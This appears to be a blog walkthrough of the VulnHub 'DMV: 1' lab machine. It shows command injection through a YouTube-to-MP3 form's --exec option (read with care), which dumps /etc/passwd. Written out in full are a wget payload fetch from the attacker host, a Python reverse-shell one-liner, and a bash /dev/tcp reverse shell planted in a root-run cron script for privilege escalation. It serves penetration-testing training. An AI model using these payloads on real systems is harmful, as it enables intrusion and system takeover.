In this vulnhub walkthrough you will learn how to complete the DMV:1 challenge. I have not figured out the significance of the name yet. There is usually a relation to the name of the box and something in or about the box.
DMV: 1 Vulnhub Walkthrough
MACHINE NAME: DMV: 1
LOCATION: https://www.vulnhub.com/entry/dmv-1,462/
AUTHOR: https://www.vulnhub.com/author/jonathan,684/
DIFFICULTY: easy
Table of Contents
Discovery Enumeration
Two services are running, ssh/http.
Host is up (0.0032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Brute forcing ssh
Since the ssh service is running I try to brute force successful authentication using hydra, but it does not work.
Web Enumeration
Viewing the website that is open it looks like something to do with converting Youtube videos to mp3 files.
To learn more about this software I enter a test id and open up Burp Suite to see the server’s response.
Exploit Using Burp Suite
Error messages from the server can be great ways to discover vulnerabilities. They tell you what the service may be. Looking at this response it is directly related to this Github repo.
According to this documentation you can use the –exec to run a command. This works as –exec%3ccommand{IFS}args` to get code execution on the remote server.
Here is the complete request from Burp to the server.
POST / HTTP/1.1
Host: 192.168.1.78
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.78/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
yt_url=–exec%3c`cat${IFS}/etc/passwd`
And the response indicates that we have arbitrary code execution. This is good!
HTTP/1.1 200 OK
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1900
Connection: close
Content-Type: text/html; charset=UTF-8
{“status”:2,”errors”:”sh: 1: cannot open root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin\nlxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\nuuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nlandscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndmv:x:1000:1000:dmv:\/home\/dmv:\/bin\/bash: No such file\n”,”url_orginal”:”–exec<cat${IFS}\/etc\/passwd“,”output”:””,”result_url”:”\/tmp\/downloads\/5f5c283b3b9fe.mp3″}
To exploit this vulnerability I will need to put in a bash oneliner to get a reverse shell back to Kali Linux.
Put this in uploadme.sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.77",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Now how to get it to the target? Start a simple Python webserver or Apache and serve it up.
Use this in your request.
yt_url=–exec%3c`wget${IFS}http://192.168.1.77:8000/uploadme.sh`
If you are not getting any hits to your webserver then check the details of the command going to the target from Burp.
kali@kali:~$ python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 …
192.168.1.78 – – [11/Sep/2020 22:01:21] “GET /uploadme.sh HTTP/1.1” 200 –
Now to execute the exploit finally use this in your request.
yt_url=–exec%3c`bash${IFS}uploadme.sh`
Start a netcat listener with the port you gave the bash oneliner, in my case the command is nc -lvp 4444. This will get a shell back to it.
Linux Privilege Escalation
Upon getting a reverse shell back I first upgrade my bash shell using this line: python -c ‘import pty; pty.spawn(“/bin/bash”)’.
Immediately it looks like in the same directory there is an interesting file, clean.sh.
rThe root user can read and write permission for this file which means it will probably execute as root.
-rw-r–r– 1 www-data www-data 17 Apr 12 05:07 clean.sh
Since we have write permissions for this folder we can overwrite the contents of clean.sh, but we can’t execute it. Put this in the file using the command:
bash -i >& /dev/tcp/192.168.1.77/1234 0>&1
Root Flag
Start a netcat listener once again and get a root shell back.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
